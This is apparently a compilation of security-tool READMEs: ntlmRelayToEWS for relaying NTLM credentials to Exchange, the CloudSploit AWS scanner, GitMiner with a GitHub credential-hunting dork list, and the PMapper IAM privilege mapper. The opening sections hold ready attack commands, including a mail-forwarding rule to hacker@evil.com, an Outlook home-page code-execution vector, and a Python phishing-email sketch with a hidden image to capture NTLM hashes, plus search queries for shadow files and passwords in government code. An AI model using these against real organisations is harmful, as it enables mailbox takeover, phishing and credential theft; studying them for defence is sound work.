    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r sendMail -d "user1@corporate.org,user2@corporate.com" -s Subject -m sampleMsg.html

    getFolder
    Retrieves all items from a predefined folder (inbox, sent items, calendar, tasks):
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r getFolder -f inbox

    forwardRule
    Creates an evil forwarding rule that forwards all incoming message for the victim to another email address:
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r forwardRule -d hacker@evil.com

    setHomePage
    Defines a folder home page (usually for the Inbox folder) by specifying a URL. This technique, uncovered by SensePost/Etienne Stalmans, allows for arbitrary command execution in the victim's Outlook program by forging a specific HTML page: Outlook Home Page – Another Ruler Vector:
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r setHomePage -f inbox -u http://path.to.evil.com/evilpage.html

    addDelegate
    Sets a delegate address on the victim's primary mailbox. In other words, the victim delegates control of their mailbox to someone else. Once done, the delegated address has full control over the victim's mailbox and can simply open it as an additional mailbox in Outlook:
    ./ntlmRelayToEWS.py -t https://target.ews.server.corporate.org/EWS/exchange.asmx -r addDelegate -d delegated.address@corporate.org


    How to get the victim to give you their credentials for relaying?
    To get the victim to send their credentials to ntlmRelayToEWS, you can use any of the following well-known methods:
    • Send the victim an e-mail with a hidden picture whose 'src' attribute points to the ntlmRelayToEWS server, using either HTTP or SMB. Check the Invoke-SendEmail.ps1 script to achieve this (a minimal sketch of this method follows this list).
    • Create a link file whose 'icon' attribute points to the ntlmRelayToEWS server using a UNC path, and let the victim browse a folder containing this link.
    • Perform LLMNR, NBNS or WPAD poisoning (think of Responder.py or Invoke-Inveigh, for instance) to get any corresponding SMB or HTTP traffic from the victim sent to ntlmRelayToEWS.
    • Others?
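    As an illustration of the first method, here is a short Python sketch (all addresses and hosts are hypothetical; Invoke-SendEmail.ps1 is the script actually referenced above) that sends an HTML e-mail containing a hidden one-pixel image pointing at the relay server:

    import smtplib
    from email.mime.text import MIMEText

    relay_host = "10.0.0.5"  # hypothetical ntlmRelayToEWS listener

    # Hidden 1x1 image: rendering it makes the victim's client fetch the URL
    # and, on an intranet, authenticate with NTLM to the listener.
    body = ('<html><body>Please review the attached report.'
            '<img src="http://%s/logo.png" width="1" height="1"/>'
            '</body></html>' % relay_host)

    msg = MIMEText(body, "html")
    msg["Subject"] = "Quarterly report"
    msg["From"] = "it-support@corporate.org"  # hypothetical sender
    msg["To"] = "victim@corporate.org"        # hypothetical victim

    with smtplib.SMTP("smtp.corporate.org") as smtp:  # hypothetical SMTP relay
        smtp.send_message(msg)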

    Author
    Arno0x0x - @Arno0x0x


    CloudSploit Scans - AWS Security Scanning Checks



    CloudSploit scans is an open-source project designed to detect security risks in an AWS account. These scripts run against an AWS account and return a series of potential misconfigurations and security risks.

    Installation
    Ensure that NodeJS is installed. If not, install it from nodejs.org.
    git clone git@github.com:cloudsploit/scans.git
    npm install

    Setup
    To begin using the scanner, edit the index.js file with your AWS key, secret, and optionally (for temporary credentials), a session token. You can also set a file containing credentials. To determine the permissions associated with your credentials, see the permissions section below. In the list of plugins in the exports.js file, comment out any plugins you do not wish to run. You can also skip entire regions by modifying the skipRegions array.
    You can also set the typical environment variables expected by the AWS SDKs, namely AWS_ACCESS_KEY_ID, AWS_SECRET_ACCESS_KEY, and AWS_SESSION_TOKEN.
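    For example (placeholder values):
    export AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE
    export AWS_SECRET_ACCESS_KEY=wJalrXUtnFEMI/K7MDENG/bPxRfiCYEXAMPLEKEY
    node index.js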

    Cross Account Roles
    When using the hosted scanner, you'll need to create a cross-account IAM role. Cross-account roles enable you to share access to your account with another AWS account using the same policy model that you're used to. The advantage is that cross-account roles are much more secure than key-based access, since an attacker who steals a cross-account role ARN still can't make API calls unless they also infiltrate the authorized AWS account.
    To create a cross-account role:
    1. Navigate to the IAM console.
    2. Click "Roles" and then "Create New Role".
    3. Provide a role name (suggested "cloudsploit").
    4. Select the "Role for Cross-Account Access" radio button.
    5. Click the "Select" button next to "Allows IAM users from a 3rd party AWS account to access this account."
    6. Enter 057012691312 for the account ID (this is the ID of CloudSploit's AWS account).
    7. Copy the auto-generated external ID from the CloudSploit web page and paste it into the AWS IAM console textbox.
    8. Ensure that "Require MFA" is not selected.
    9. Click "Next Step".
    10. Select the "Security Audit" policy. Then click "Next Step" again.
    11. Click through to create the role.

    Permissions
    The scans require read-only permissions to your account. This can be done by adding the "Security Audit" AWS managed policy to your IAM user or role.

    Security Audit Managed Policy (Recommended)
    To configure the managed policy:
    1. Open the IAM Console.
    2. Find your user or role.
    3. Click the "Permissions" tab.
    4. Under "Managed Policy", click "Attach policy".
    5. In the filter box, enter "Security Audit"
    6. Select the "Security Audit" policy and save.

    Inline Policy (Not Recommended)
    If you'd prefer to be more restrictive, the following IAM policy contains the exact permissions used by the scan.
    WARNING: This policy will likely change as more plugins are written. If a test returns "UNKNOWN" it is likely missing a required permission. The preferred method is to use the "Security Audit" policy.
    {
      "Version": "2012-10-17",
      "Statement": [
        {
          "Action": [
            "cloudfront:ListDistributions",
            "cloudtrail:DescribeTrails",
            "configservice:DescribeConfigurationRecorders",
            "configservice:DescribeConfigurationRecorderStatus",
            "ec2:DescribeInstances",
            "ec2:DescribeSecurityGroups",
            "ec2:DescribeAccountAttributes",
            "ec2:DescribeAddresses",
            "ec2:DescribeVpcs",
            "ec2:DescribeFlowLogs",
            "ec2:DescribeSubnets",
            "elasticloadbalancing:DescribeLoadBalancerPolicies",
            "elasticloadbalancing:DescribeLoadBalancers",
            "iam:GenerateCredentialReport",
            "iam:ListServerCertificates",
            "iam:ListGroups",
            "iam:GetGroup",
            "iam:GetAccountPasswordPolicy",
            "iam:ListUsers",
            "iam:ListUserPolicies",
            "iam:ListAttachedUserPolicies",
            "kms:ListKeys",
            "kms:DescribeKey",
            "kms:GetKeyRotationStatus",
            "rds:DescribeDBInstances",
            "rds:DescribeDBClusters",
            "route53domains:ListDomains",
            "s3:GetBucketVersioning",
            "s3:GetBucketLogging",
            "s3:GetBucketAcl",
            "s3:ListBuckets",
            "ses:ListIdentities",
            "ses:getIdentityDkimAttributes"
          ],
          "Effect": "Allow",
          "Resource": "*"
        }
      ]
    }

    Running
    To run a standard scan, showing all outputs and results, simply run:
    node index.js

    Optional Plugins
    Some plugins may require additional permissions not outlined above. Since their required IAM permissions are not included in the SecurityAudit managed policy, these plugins are not included in the exports.js file by default. To enable them, uncomment them in the exports.js file, add the required permissions to an inline IAM policy, and re-run the scan.

    Compliance
    CloudSploit also supports mapping of its plugins to particular compliance policies. To run the compliance scan, use the --compliance flag. For example:
    node index.js --compliance=hipaa
    CloudSploit currently supports the following compliance mappings:

    HIPAA
    HIPAA scans map CloudSploit plugins to the Health Insurance Portability and Accountability Act of 1996.

    Architecture
    CloudSploit works in two phases. First, it queries the AWS APIs for various metadata about your account. This is known as the "collection" phase. Once all the necessary data has been collected, the result is passed to the second phase - "scanning." The scan uses the collected data to search for potential misconfigurations, risks, and other security issues. These are then provided as output.

    Writing a Plugin

    Collection Phase
    To write a plugin, you must understand what AWS API calls your scan makes. These must be added to the collect.js file. This file determines the AWS API calls and the order in which they are made. For example:
    CloudFront: {
    listDistributions: {
    property: 'DistributionList',
    secondProperty: 'Items'
    }
    },
    This declaration tells the CloudSploit collection engine to query the CloudFront service using the listDistributions call and then save the results returned under DistributionList.Items.
    The second section in collect.js is postCalls, an array of objects defining API calls that rely on other calls being returned first. For example, if you need to first query for all EC2 instances, and then loop through each instance and run a more detailed call, you would add the EC2:DescribeInstances call in the first calls section and then add the more detailed call in postCalls, setting it to rely on the output of DescribeInstances.
    An example:
    getGroup: {
    reliesOnService: 'iam',
    reliesOnCall: 'listGroups',
    filterKey: 'GroupName',
    filterValue: 'GroupName'
    },
    This section tells CloudSploit to wait until the IAM:listGroups call has been made, and then loop through the data that is returned. The filterKey tells CloudSploit the name of the key from the original response, while filterValue tells it which property to set in the getGroup call filter. For example: iam.getGroup({GroupName:abc}) where abc is the GroupName from the returned list. CloudSploit will loop through each response, re-invoking getGroup for each element.

    Scanning Phase
    After the data has been collected, it is passed to the scanning engine, where the results are analyzed for risks. Each plugin must:
    • Export the following:
      • title (string): a user-friendly title for the plugin
      • category (string): the AWS category (EC2, RDS, ELB, etc.)
      • description (string): a description of what the plugin does
      • more_info (string): a more detailed description of the risk being tested for
      • link (string): an AWS help URL describing the service or risk, preferably with mitigation methods
      • recommended_action (string): what the user should do to mitigate the risk found
      • run (function): a function that runs the test (see below)
    • Accept a collection object via the run function containing the full collection object obtained in the first phase.
    • Call back with the results and the data source.

    Result Codes
    Each test has a result code that is used to determine if the test was successful and its risk level. The following codes are used:
    • 0: OKAY: No risks
    • 1: WARN: The result represents a potential misconfiguration or issue but is not an immediate risk
    • 2: FAIL: The result presents an immediate risk to the security of the account
    • 3: UNKNOWN: The results could not be determined (API failure, wrong permissions, etc.)

    Tips for Writing Plugins
    • Many security risks can be detected using the same API calls. To minimize the number of API calls being made, utilize the cache helper function to cache the results of an API call made in one test for future tests. For example, two plugins: "s3BucketPolicies" and "s3BucketPreventDelete" both call APIs to list every S3 bucket. These can be combined into a single plugin "s3Buckets" which exports two tests called "bucketPolicies" and "preventDelete". This way, the API is called once, but multiple tests are run on the same results.
    • Ensure AWS API calls are being used optimally. For example, call describeInstances with empty parameters to get all instances, instead of calling describeInstances multiple times looping through each instance name.
    • Use async.eachLimit to reduce the number of simultaneous API calls. Instead of using a for loop on 100 requests, spread them out using async's each limit.

    Example
    To more clearly illustrate writing a new plugin, let's consider the "IAM Empty Groups" plugin. First, we know that we will need to query for a list of groups via listGroups, then loop through each group and query for the more detailed set of data via getGroup.
    We'll add these API calls to collect.js. First, under calls add:
    IAM: {
    listGroups: {
    property: 'Groups'
    }
    },
    The property tells CloudSploit which property to read in the response from AWS.
    Then, under postCalls, add:
    IAM: {
    getGroup: {
    reliesOnService: 'iam',
    reliesOnCall: 'listGroups',
    filterKey: 'GroupName',
    filterValue: 'GroupName'
    }
    },
    CloudSploit will first get the list of groups, then, it will loop through each one, using the group name to get more detailed info via getGroup.
    Next, we'll write the plugin. Create a new file in the plugins/iam folder called emptyGroups.js (this plugin already exists, but you can create a similar one for the purposes of this example).
    In the file, we'll be sure to export the plugin's title, category, description, link, and more information about it. Additionally, we will add any API calls it makes:
    apis: ['IAM:listGroups', 'IAM:getGroup'],
    In the run function, we can obtain the output of the collection phase from earlier by doing:
    var listGroups = helpers.addSource(cache, source,
    ['iam', 'listGroups', region]);
    Then, we can loop through each of the results and do:
    var getGroup = helpers.addSource(cache, source,
    ['iam', 'getGroup', region, group.GroupName]);
    The helpers function ensures that the proper results are returned from the collection and that they are saved into a "source" variable which can be returned with the results.
    Now, we can write the plugin functionality by checking for the data relevant to our requirements:
    if (!getGroup || getGroup.err || !getGroup.data || !getGroup.data.Users) {
    helpers.addResult(results, 3, 'Unable to query for group: ' + group.GroupName, 'global', group.Arn);
    } else if (!getGroup.data.Users.length) {
    helpers.addResult(results, 1, 'Group: ' + group.GroupName + ' does not contain any users', 'global', group.Arn);
    return cb();
    } else {
    helpers.addResult(results, 0, 'Group: ' + group.GroupName + ' contains ' + getGroup.data.Users.length + ' user(s)', 'global', group.Arn);
    }
    The addResult function ensures we are adding the results to the results array in the proper format. This function accepts the following:
    (results array, score, message, region, resource)
    The resource is optional, and the score must be between 0 and 3, indicating OKAY, WARN, FAIL, or UNKNOWN respectively.


    GitMiner v2.0 - Tool For Advanced Mining For Content On Github


    Advanced search and automation tool for Github. It facilitates searching for code or code snippets on Github through the site's search page.

    MOTIVATION
    Demonstrates the fragility of trusting public repositories to store code containing sensitive information.

    REQUIREMENTS
    lxml
    requests
    argparse
    json
    re

    INSTALL
    git clone http://github.com/UnkL4b/GitMiner

    sudo apt-get install python-requests python-lxml
    OR
    pip install -r requirements.txt

    Docker
    git clone http://github.com/UnkL4b/GitMiner
    cd GitMiner
    docker build -t gitminer .
    docker run -it gitminer -h

    HELP

    UnkL4b
    __ Automatic search for Github
    ((OO)) ▄████ ██▓▄▄▄█████▓ ███▄ ▄███▓ ██▓ ███▄ █ ▓█████ ██▀███
    \__/ ██▒ ▀█▒▓██▒▓ ██▒ ▓▒▓██▒▀█▀ ██▒▓██▒ ██ ▀█ █ ▓█ ▀ ▓██ ▒ ██▒ OO
    |^| ▒██░▄▄▄░▒██▒▒ ▓██░ ▒░▓██ ▓██░▒██▒▓██ ▀█ ██▒▒███ ▓██ ░▄█ ▒ oOo
    | | ░▓█ ██▓░██░░ ▓██▓ ░ ▒██ ▒██ ░██░▓██▒ ▐▌██▒▒▓█ ▄ ▒██▀▀█▄ OoO
    | | ░▒▓███▀▒░██░ ▒██▒ ░ ▒██▒ ░██▒░██░▒██░ ▓██░░▒████▒░██▓ ▒██▒ /oOo
    | |___░▒___▒_░▓____▒_░░___░_▒░___░__░░▓__░_▒░___▒_▒_░░_▒░_░░_▒▓_░▒▓░_/ /
    \______░___░__▒_░____░____░__░______░_▒_░░_░░___░_▒░_░_░__░__░▒_░_▒░__/ v2.0
    ░ ░ ░ ▒ ░ ░ ░ ░ ▒ ░ ░ ░ ░ ░ ░░ ░
    ░ ░ ░ ░ ░ ░ ░ ░

    -> github.com/UnkL4b
    -> unkl4b.github.io

    +---------------------[WARNING]---------------------+
    | DEVELOPERS ASSUME NO LIABILITY AND ARE NOT |
    | RESPONSIBLE FOR ANY MISUSE OR DAMAGE CAUSED BY |
    | THIS PROGRAM |
    +---------------------------------------------------+
    [-h] [-q 'filename:shadow path:etc']
    [-m wordpress] [-o result.txt]
    [-r '/^\s*.*?;?\s*$/gm']
    [-c _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09--434afdd652b37745f995ab55fc83]

    optional arguments:
    -h, --help show this help message and exit
    -q 'filename:shadow path:etc', --query 'filename:shadow path:etc'
    Specify search term
    -m wordpress, --module wordpress
    Specify the search module
    -o result.txt, --output result.txt
    Specify the output file where it will be
    saved
    -r '/^\s*(.*?);?\s*$/gm', --regex '/^\s*(.*?);?\s*$/gm'
    Set regex to search in file
    -c _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09--434afdd652b37745f995ab55fc83, --cookie _octo=GH1.1.2098292984896.153133829439; _ga=GA1.2.36424941.153192375318; user_session=oZIxL2_ajeDplJSndfl37ddaLAEsR2l7myXiiI53STrfhqnaN; __Host-user_session_same_site=oXZxv9_ajeDplV0gAEsmyXiiI53STrfhDN; logged_in=yes; dotcom_user=unkl4b; tz=America%2FSao_Paulo; has_recent_activity=1; _gh_sess=MmxxOXBKQ1RId3NOVGpGcG54aEVnT1o0dGhxdGdzWVpySnFRd1dVYUk5TFZpZXFuTWxOdW1FK1IyM0pONjlzQWtZM2xtaFR3ZDdxlGMCsrWnBIdnhUN0tjVUtMYU1GeG5Pbm5DMThuWUFETnZjcllGOUNkRGUwNUtKOVJTaGR5eUJYamhWRE5XRnMWZZN3Y3dlpFNDZXL1NWUEN4c093RFhQd3RJQ1NBdmhrVDE3VVNiUFF3dHBycC9FeDZ3cFVXV0ZBdXZieUY5WDRlOE9ZSG5sNmRHUmllcmk0Up1MTcyTXZrN1RHYmJSdz09--434afdd652b37745f995ab55fc83
    Specify the cookie for your github

    EXAMPLE
    Searching for wordpress configuration files with passwords:
    $:> python gitminer-v2.0.py -q 'filename:wp-config extension:php FTP_HOST in:file ' -m wordpress -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4 -o result.txt


    Looking for Brazilian government files containing passwords:
    $:> python gitminer-v2.0.py --query 'extension:php "root" in:file AND "gov.br" in:file' -m senhas -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
    Looking for shadow files in the etc path:
    $:> python gitminer-v2.0.py --query 'filename:shadow path:etc' -m root -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4
    Searching for joomla configuration files with passwords:
    $:> python gitminer-v2.0.py --query 'filename:configuration extension:php "public password" in:file' -m joomla -c pAAAhPOma9jEsXyLWZ-16RTTsGI8wDawbNs4


    Hacking SSH Servers


    Dork to search

    by @techgaun (https://github.com/techgaun/github-dorks)
    Dork | Description
    filename:.npmrc _auth | npm registry authentication data
    filename:.dockercfg auth | docker registry authentication data
    extension:pem private | private keys
    extension:ppk private | puttygen private keys
    filename:id_rsa or filename:id_dsa | private ssh keys
    extension:sql mysql dump | mysql dump
    extension:sql mysql dump password | mysql dump, look for password; you can try varieties
    filename:credentials aws_access_key_id | might return false negatives with dummy values
    filename:.s3cfg | might return false negatives with dummy values
    filename:wp-config.php | wordpress config files
    filename:.htpasswd | htpasswd files
    filename:.env DB_USERNAME NOT homestead | laravel .env (CI, various ruby based frameworks too)
    filename:.env MAIL_HOST=smtp.gmail.com | gmail smtp configuration (try different smtp services too)
    filename:.git-credentials | git credentials store, add NOT username for more valid results
    PT_TOKEN language:bash | pivotaltracker tokens
    filename:.bashrc password | search for passwords, etc. in .bashrc (try with .bash_profile too)
    filename:.bashrc mailchimp | variation of above (try more variations)
    filename:.bash_profile aws | aws access and secret keys
    rds.amazonaws.com password | Amazon RDS possible credentials
    extension:json api.forecast.io | try variations, find api keys/secrets
    extension:json mongolab.com | mongolab credentials in json configs
    extension:yaml mongolab.com | mongolab credentials in yaml configs (try with yml)
    jsforce extension:js conn.login | possible salesforce credentials in nodejs projects
    SF_USERNAME salesforce | possible salesforce credentials
    filename:.tugboat NOT _tugboat | Digital Ocean tugboat config
    HEROKU_API_KEY language:shell | Heroku api keys
    HEROKU_API_KEY language:json | Heroku api keys in json files
    filename:.netrc password | netrc that possibly holds sensitive credentials
    filename:_netrc password | netrc that possibly holds sensitive credentials
    filename:hub oauth_token | hub config that stores github tokens
    filename:robomongo.json | mongodb credentials file used by robomongo
    filename:filezilla.xml Pass | filezilla config file with possible user/pass to ftp
    filename:recentservers.xml Pass | filezilla config file with possible user/pass to ftp
    filename:config.json auths | docker registry authentication data
    filename:idea14.key | IntelliJ Idea 14 key, try variations for other versions
    filename:config irc_pass | possible IRC config
    filename:connections.xml | possible db connections configuration, try variations to be specific
    filename:express.conf path:.openshift | openshift config, only email and server though
    filename:.pgpass | PostgreSQL file which can contain passwords
    filename:proftpdpasswd | usernames and passwords of proftpd created by cpanel
    filename:ventrilo_srv.ini | Ventrilo configuration
    [WFClient] Password= extension:ica | WinFrame-Client info needed by users to connect to Citrix Application Servers
    filename:server.cfg rcon password | Counter Strike RCON passwords
    JEKYLL_GITHUB_TOKEN | Github tokens used for jekyll
    filename:.bash_history | Bash history file
    filename:.cshrc | RC file for csh shell
    filename:.history | history file (often used by many tools)
    filename:.sh_history | korn shell history
    filename:sshd_config | OpenSSH server config
    filename:dhcpd.conf | DHCP service config
    filename:prod.exs NOT prod.secret.exs | Phoenix prod configuration file
    filename:prod.secret.exs | Phoenix prod secret
    filename:configuration.php JConfig password | Joomla configuration file
    filename:config.php dbpasswd | PHP application database password (e.g., phpBB forum software)
    path:sites databases password | Drupal website database credentials
    shodan_api_key language:python | Shodan API keys (try other languages too)
    filename:shadow path:etc | contains encrypted passwords and account information of newer unix systems
    filename:passwd path:etc | contains user account information including encrypted passwords of traditional unix systems
    extension:avastlic | contains license keys for Avast! Antivirus
    extension:dbeaver-data-sources.xml | DBeaver config containing MySQL credentials
    filename:.esmtprc password | esmtp configuration
    extension:json googleusercontent client_secret | OAuth credentials for accessing Google APIs
    HOMEBREW_GITHUB_API_TOKEN language:shell | Github token usually set by homebrew users
    xoxp OR xoxb | Slack bot and private tokens
    .mlab.com password | mLab hosted MongoDB credentials
    filename:logins.json | Firefox saved password collection (key3.db usually in same repo)
    filename:CCCam.cfg | CCCam server config file
    msg nickserv identify filename:config | possible IRC login passwords
    filename:settings.py SECRET_KEY | Django secret keys (usually allows for session hijacking, RCE, etc)


    PMapper - A Tool For Quickly Evaluating IAM Permissions In AWS


    A project to speed up the process of reviewing an AWS account's IAM configuration.

    Purpose
    The goal of the AWS IAM auth system is to apply and enforce access controls on actions and resources in AWS. This tool helps identify whether the policies in place will accomplish the intent of the account's owners.
    AWS already has tooling in place to check if policies attached to a resource will permit an action. This tool builds on that functionality to identify other potential paths for a user to get access to a resource. This means checking for access to other users, roles, and services as ways to pivot.

    How to Use
    1. Download this repository and install its dependencies with pip install -r requirements.txt.
    2. Ensure you have graphviz installed on your host.
    3. Set up an IAM user in your AWS account with a policy that grants the necessary permissions to run this tool (see the file mapper-policy.json for an example). The ReadOnlyAccess managed policy works for this purpose. Grab the access keys created for this user.
    4. In the AWS CLI, set up a profile for that IAM user with the command: aws configure --profile <profile_name>, where <profile_name> is a unique name.
    5. Run the command python pmapper.py --profile <profile_name> graph to begin pulling data about your account down to your computer.

    Graphing
    Principal Mapper has a graph subcommand, which does the heavy work of going through each principal in an account and finding any other principals it can access. The results are stored at ~/.principalmap and used by other subcommands.

    Querying
    Principal Mapper has a query subcommand that runs a user-defined query. The queries can check if one or more principals can do a given action with a given resource. The supported queries are:
    "can <Principal> do <Action> [with <Resource>]"
    "who can do <Action> [with <Resource>]"
    "preset <preset_query_name> <preset_query_args>"
    The first form checks if a principal, or any other principal accessible to it, could perform an action with a resource (default wildcard). The second form enumerates all principals that are able to perform an action with a resource.
    Note the quotes around the full query; they ensure the argument parser treats it as a single string.
    Note that <Principal> can be either the full ARN of a principal or the last part of that ARN (user/... or role/...).

    Presets
    The existing presets are priv_esc and change_perms, which are aliases with the same function: they identify principals that have the ability to change their own permissions. If a principal can change its own permissions, it effectively has unlimited permissions.

    Visualizing
    The visualize subcommand produces a DOT and SVG file that represent the nodes and edges that were graphed.
    To create the DOT and SVG files, run the command: python pmapper.py visualize
    Currently the output is a directed graph, which collates all the edges with the same source and destination nodes. It does not draw edges where the source is an admin. Nodes for admins are colored blue. Nodes for users with the ability to access admins are colored red (potential priv-esc risk).

    Sample Output

    Pulling a graph
    esteringer@ubuntu:~/Documents/projects/Skywalker$ python pmapper.py graph
    Using profile: skywalker
    Pulling data for account [REDACTED]
    Using principal with ARN arn:aws:iam::[REDACTED]:user/TestingSkywalker
    [+] Starting EC2 checks.
    [+] Starting IAM checks.
    [+] Starting Lambda checks.
    [+] Starting CloudFormation checks.
    [+] Completed CloudFormation checks.
    [+] Completed EC2 checks.
    [+] Completed Lambda checks.
    [+] Completed IAM checks.
    Created an AWS Graph with 16 nodes and 53 edges
    [NODES]
    AWSNode("arn:aws:iam::[REDACTED]:user/AdminUser", properties={u'is_admin': True, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/EC2Manager", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/LambdaDeveloper", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/LambdaFullAccess", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/PowerUser", properties={u'is_admin': False, u'rootstr': u'arn:aws:iam::[REDACTED]:root', u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/S3ManagementUser", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/S3ReadOnly", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:user/TestingSkywalker", properties={u'is_admin': False, u'type': u'user'})
    AWSNode("arn:aws:iam::[REDACTED]:role/AssumableRole", properties={u'is_admin': False, u'type': u'role', u'name': u'AssumableRole'})
    AWSNode("arn:aws:iam::[REDACTED]:role/EC2-Fleet-Manager", properties={u'is_admin': False, u'type': u'role', u'name': u'EC2-Fleet-Manager'})
    AWSNode("arn:aws:iam::[REDACTED]:role/EC2Role-Admin", properties={u'is_admin': True, u'type': u'role', u'name': u'EC2Role-Admin'})
    AWSNode("arn:aws:iam::[REDACTED]:role/EC2WithS3ReadOnly", properties={u'is_admin': False, u'type': u'role', u'name': u'EC2WithS3ReadOnly'})
    AWSNode("arn:aws:iam::[REDACTED]:role/EMR-Service-Role", properties={u'is_admin': False, u'type': u'role', u'name': u'EMR-Service-Role'})
    AWSNode("arn:aws:iam::[REDACTED]:role/LambdaRole-S3ReadOnly", properties={u'is_admin': False, u'type': u'role', u'name': u'LambdaRole-S3ReadOnly'})
    AWSNode("arn:aws:iam::[REDACTED]:role/ReadOnlyWithLambda", properties={u'is_admin': False, u'type': u'role', u'name': u'ReadOnlyWithLambda'})
    AWSNode("arn:aws:iam::[REDACTED]:role/UpdateCredentials", properties={u'is_admin': False, u'type': u'role', u'name': u'UpdateCredentials'})
    [EDGES]
    (0,1,'ADMIN','can use existing administrative privileges to access')
    (0,2,'ADMIN','can use existing administrative privileges to access')
    (0,3,'ADMIN','can use existing administrative privileges to access')
    (0,4,'ADMIN','can use existing administrative privileges to access')
    (0,5,'ADMIN','can use existing administrative privileges to access')
    (0,6,'ADMIN','can use existing administrative privileges to access')
    (0,7,'ADMIN','can use existing administrative privileges to access')
    (0,8,'ADMIN','can use existing administrative privileges to access')
    (0,9,'ADMIN','can use existing administrative privileges to access')
    (0,10,'ADMIN','can use existing administrative privileges to access')
    (0,11,'ADMIN','can use existing administrative privileges to access')
    (0,12,'ADMIN','can use existing administrative privileges to access')
    (0,13,'ADMIN','can use existing administrative privileges to access')
    (0,14,'ADMIN','can use existing administrative privileges to access')
    (0,15,'ADMIN','can use existing administrative privileges to access')
    (10,0,'ADMIN','can use existing administrative privileges to access')
    (10,1,'ADMIN','can use existing administrative privileges to access')
    (10,2,'ADMIN','can use existing administrative privileges to access')
    (10,3,'ADMIN','can use existing administrative privileges to access')
    (10,4,'ADMIN','can use existing administrative privileges to access')
    (10,5,'ADMIN','can use existing administrative privileges to access')
    (10,6,'ADMIN','can use existing administrative privileges to access')
    (10,7,'ADMIN','can use existing administrative privileges to access')
    (10,8,'ADMIN','can use existing administrative privileges to access')
    (10,9,'ADMIN','can use existing administrative privileges to access')
    (10,11,'ADMIN','can use existing administrative privileges to access')
    (10,12,'ADMIN','can use existing administrative privileges to access')
    (10,13,'ADMIN','can use existing administrative privileges to access')
    (10,14,'ADMIN','can use existing administrative privileges to access')
    (10,15,'ADMIN','can use existing administrative privileges to access')
    (1,9,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (1,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (1,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,9,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (3,13,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (3,14,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (3,15,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (9,10,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,13,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (9,11,'EC2_USEPROFILE','can create an EC2 instance and use an existing instance profile to access')
    (4,8,'STS_ASSUMEROLE','can use STS to assume the role')
    (4,14,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (4,15,'LAMBDA_CREATEFUNCTION','can create a Lambda function and pass an execution role to access')
    (15,0,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,1,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,2,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,3,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,4,'IAM_CREATEKEY','can create access keys with IAM to access')
    (15,5,'IAM_CREATEKEY','can create access keys with IAM to access')
